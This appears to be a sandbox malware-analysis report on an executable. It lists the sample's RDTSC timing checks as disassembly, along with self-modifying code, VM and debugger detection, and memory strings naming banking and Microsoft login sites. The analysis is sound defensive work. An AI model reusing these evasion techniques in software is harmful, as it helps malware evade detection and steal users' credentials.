              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6078C second address: 4E60790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60790 second address: 4E60796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60796 second address: 4E607C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [75AF86D4h] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 push FFFFFFFEh 0x00000016 push 76F8CA08h 0x0000001b push 76EFAE00h 0x00000020 mov eax, dword ptr fs:[00000000h] 0x00000026 push eax 0x00000027 sub esp, 0Ch 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [76FAB370h] 0x00000032 xor dword ptr [ebp-08h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b mov dword ptr fs:[00000000h], eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 mov eax, dword ptr fs:[00000018h] 0x0000004a test eax, eax 0x0000004c je 00007FC714ED3531h 0x00000052 mov dword ptr [ebp-04h], 00000000h 0x00000059 mov edx, dword ptr [ebp+08h] 0x0000005c mov dword ptr [eax+00000BF4h], edx 0x00000062 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000069 test edx, edx 0x0000006b je 00007FC714E8FF89h 0x00000071 xor edx, edx 0x00000073 jmp 00007FC714E8FEC8h 0x00000075 mov eax, edx 0x00000077 mov ecx, dword ptr [ebp-10h] 0x0000007a mov dword ptr fs:[00000000h], ecx 0x00000081 pop ecx 0x00000082 pop edi 0x00000083 pop esi 0x00000084 pop ebx 0x00000085 mov esp, ebp 0x00000087 pop ebp 0x00000088 retn 0004h 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007FC714E8FEF7h 0x00000092 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607C7 second address: 4E607CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607CD second address: 4E60862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e call 00007FC714E8FEF4h 0x00000013 mov edx, esi 0x00000015 pop ecx 0x00000016 pushfd 0x00000017 jmp 00007FC714E8FEF7h 0x0000001c sub ecx, 1D886D6Eh 0x00000022 jmp 00007FC714E8FEF9h 0x00000027 popfd 0x00000028 popad 0x00000029 jg 00007FC785ACDB41h 0x0000002f pushad 0x00000030 mov ecx, 002E3B93h 0x00000035 mov di, ax 0x00000038 popad 0x00000039 js 00007FC714E8FF75h 0x0000003f jmp 00007FC714E8FEF2h 0x00000044 cmp dword ptr [ebp-14h], edi 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60862 second address: 4E6087F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6087F second address: 4E60885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60885 second address: 4E60889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60889 second address: 4E6088D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60993 second address: 4E609AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E98438h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E609AF second address: 4E609ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC714E8FEF9h 0x00000012 or ch, FFFFFFC6h 0x00000015 jmp 00007FC714E8FEF1h 0x0000001a popfd 0x0000001b push esi 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E609ED second address: 4E60A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC714E9842Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60010 second address: 4E60016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60016 second address: 4E60035 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ch, BCh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60035 second address: 4E60063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FC714E8FEF3h 0x0000000b push eax 0x0000000c pop edx 0x0000000d pop esi 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC714E8FEEEh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60063 second address: 4E600A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC714E9842Fh 0x00000010 xchg eax, ecx 0x00000011 jmp 00007FC714E98436h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC714E9842Eh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600A5 second address: 4E600E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC714E8FEEDh 0x0000000b add esi, 13847A46h 0x00000011 jmp 00007FC714E8FEF1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC714E8FEEDh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600E3 second address: 4E600E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600E9 second address: 4E600ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600ED second address: 4E600F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600F1 second address: 4E60114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-04h], 55534552h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC714E8FEF2h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60134 second address: 4E60157 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E98438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60157 second address: 4E6015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6015D second address: 4E60D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E98432h 0x00000009 and si, A138h 0x0000000e jmp 00007FC714E9842Bh 0x00000013 popfd 0x00000014 jmp 00007FC714E98438h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c ret 0x0000001d nop 0x0000001e and bl, 00000001h 0x00000021 movzx eax, bl 0x00000024 lea esp, dword ptr [ebp-0Ch] 0x00000027 pop esi 0x00000028 pop edi 0x00000029 pop ebx 0x0000002a pop ebp 0x0000002b ret 0x0000002c add esp, 04h 0x0000002f jmp dword ptr [004DA41Ch+ebx*4] 0x00000036 push edi 0x00000037 call 00007FC714EBDE27h 0x0000003c push ebp 0x0000003d push ebx 0x0000003e push edi 0x0000003f push esi 0x00000040 sub esp, 000001D0h 0x00000046 mov dword ptr [esp+000001B4h], 004DCB10h 0x00000051 mov dword ptr [esp+000001B0h], 000000D0h 0x0000005c mov dword ptr [esp], 00000000h 0x00000063 mov eax, dword ptr [004D81DCh] 0x00000068 call eax 0x0000006a mov edi, edi 0x0000006c pushad 0x0000006d jmp 00007FC714E9842Eh 0x00000072 mov eax, 6DFCC1E1h 0x00000077 popad 0x00000078 xchg eax, ebp 0x00000079 jmp 00007FC714E9842Ch 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 pushad 0x00000084 popad 0x00000085 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60D46 second address: 4E60D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60D4A second address: 4E60D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60D50 second address: 4E60DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E8FEF0h 0x00000009 and ah, FFFFFFD8h 0x0000000c jmp 00007FC714E8FEEBh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FC714E8FEF6h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e jmp 00007FC714E8FEEEh 0x00000023 call 00007FC714E8FEF2h 0x00000028 mov ecx, 4D6925F1h 0x0000002d pop ecx 0x0000002e popad 0x0000002f cmp dword ptr [75AF459Ch], 05h 0x00000036 jmp 00007FC714E8FEEDh 0x0000003b je 00007FC785ABDB1Ah 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push edx 0x00000045 pop eax 0x00000046 call 00007FC714E8FEEFh 0x0000004b pop eax 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60DE7 second address: 4E60DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60E28 second address: 4E60EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FC714E8FEE9h 0x0000000e pushad 0x0000000f pushad 0x00000010 mov si, dx 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FC714E8FEEFh 0x0000001a xor eax, 00698F2Eh 0x00000020 jmp 00007FC714E8FEF9h 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007FC714E8FEF1h 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 jmp 00007FC714E8FEF1h 0x00000036 mov eax, dword ptr [eax] 0x00000038 jmp 00007FC714E8FEF1h 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 pushad 0x00000042 mov si, dx 0x00000045 popad 0x00000046 pop eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60EC7 second address: 4E60EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC714E98437h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60EE4 second address: 4E60EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60EEA second address: 4E60F35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FC785ACD0A6h 0x0000000d push 75A92B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AF4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 pushad 0x00000053 pushad 0x00000054 mov cx, 124Fh 0x00000058 jmp 00007FC714E98434h 0x0000005d popad 0x0000005e popad 0x0000005f mov esi, 00000000h 0x00000064 jmp 00007FC714E9842Ch 0x00000069 mov dword ptr [ebp-1Ch], esi 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FC714E9842Ah 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60F35 second address: 4E60F44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60F80 second address: 4E60FD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E98431h 0x00000009 and ecx, 21A56106h 0x0000000f jmp 00007FC714E98431h 0x00000014 popfd 0x00000015 call 00007FC714E98430h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e cmp dword ptr [ebp+08h], 00002000h 0x00000025 pushad 0x00000026 mov di, 36F2h 0x0000002a push ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8085F second address: 4E808BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC714E8FEF6h 0x00000008 mov cx, E0B1h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 mov ecx, 1C7FF4E9h 0x00000018 call 00007FC714E8FEF6h 0x0000001d push eax 0x0000001e pop edi 0x0000001f pop esi 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC714E8FEF8h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E808BE second address: 4E8093F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC714E98434h 0x00000011 or si, F678h 0x00000016 jmp 00007FC714E9842Bh 0x0000001b popfd 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 mov eax, 35DE8FA7h 0x00000027 mov edx, eax 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b jmp 00007FC714E98436h 0x00000030 mov esi, dword ptr [ebp+0Ch] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushfd 0x00000037 jmp 00007FC714E9842Ch 0x0000003c xor eax, 642ADB38h 0x00000042 jmp 00007FC714E9842Bh 0x00000047 popfd 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8093F second address: 4E80A3D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC714E8FEF8h 0x00000008 adc ch, FFFFFF98h 0x0000000b jmp 00007FC714E8FEEBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 call 00007FC714E8FEF8h 0x00000018 jmp 00007FC714E8FEF2h 0x0000001d pop eax 0x0000001e popad 0x0000001f test esi, esi 0x00000021 jmp 00007FC714E8FEF1h 0x00000026 je 00007FC785A9D8F3h 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FC714E8FEECh 0x00000033 adc ax, 0988h 0x00000038 jmp 00007FC714E8FEEBh 0x0000003d popfd 0x0000003e call 00007FC714E8FEF8h 0x00000043 pushfd 0x00000044 jmp 00007FC714E8FEF2h 0x00000049 xor ax, 1F18h 0x0000004e jmp 00007FC714E8FEEBh 0x00000053 popfd 0x00000054 pop esi 0x00000055 popad 0x00000056 cmp dword ptr [75AF459Ch], 05h 0x0000005d jmp 00007FC714E8FEEFh 0x00000062 je 00007FC785AB595Ah 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b jmp 00007FC714E8FEEBh 0x00000070 mov esi, 05BF68AFh 0x00000075 popad 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80A3D second address: 4E80A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80A43 second address: 4E80A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 call 00007FC714E8FEEEh 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov edi, 5A3C7B76h 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC714E8FEF3h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80B59 second address: 4E80B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80B5F second address: 4E80B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4EEF23 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6A128F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 69FE4A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4EC236 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6CB73E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 72B48E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3876Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 4512Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2276496138.0000000000682000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: file.exe, 00000000.00000003.2195045761.00000000057EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2277498147.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269401849.0000000001007000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000003.2195045761.00000000057EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: file.exe, 00000000.00000002.2277498147.0000000000FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2276496138.0000000000682000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: file.exe, 00000000.00000003.2195045761.00000000057E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
